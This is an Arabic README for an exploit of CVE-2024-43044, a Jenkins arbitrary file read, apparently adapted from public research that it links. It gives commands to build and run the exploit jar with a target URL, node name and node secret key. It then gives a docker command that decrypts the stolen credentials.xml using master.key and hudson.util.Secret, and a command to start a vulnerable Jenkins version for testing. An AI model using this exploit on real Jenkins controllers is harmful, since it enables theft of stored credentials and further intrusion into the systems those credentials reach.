
استغلال لـ CVE-2024-43044 يمكّن من قراءة أي ملف من وحدة تحكم Jenkins لاستخراج وفك تشفير credentials.xml باستخدام المفاتيح السرية.
هذا استغلال لـ CVE-2024-43044، وهي قراءة ملفات تعسفية تسمح للوكيل بجلب ملفات من المتحكم.
سيستخدم الاستغلال الثغرة لقراءة ملف credentials.xml والحصول على المفاتيح السرية لفك تشفيره.
الكود الأولي : https://github.com/convisolabs/CVE-2024-43044-jenkins الشرح الأصلي : https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/
mvn package
java -jar exploit.jar mode_secret <jenkinsUrl> <nodeName> <nodeSecretKey>
docker run \
--rm \
--network none \
--workdir / \
--mount "type=bind,src=$PWD/master.key,dst=/master.key" \
--mount "type=bind,src=$PWD/hudson.util.Secret,dst=/hudson.util.Secret" \
--mount "type=bind,src=$PWD/credentials.xml,dst=/credentials.xml" \
docker.io/hoto/jenkins-credentials-decryptor:latest \
/jenkins-credentials-decryptor \
-m master.key \
-s hudson.util.Secret \
-c credentials.xml \
-o json
يمكنك اختباره في إصدار ثغري باستخدام docker:
docker run -p 8080:8080 -p 50000:50000 --restart=on-failure jenkins/jenkins:2.441-jdk17
بمجرد أن يكون لديك Jenkins قيد التشغيل، قم بإعداد وكيل.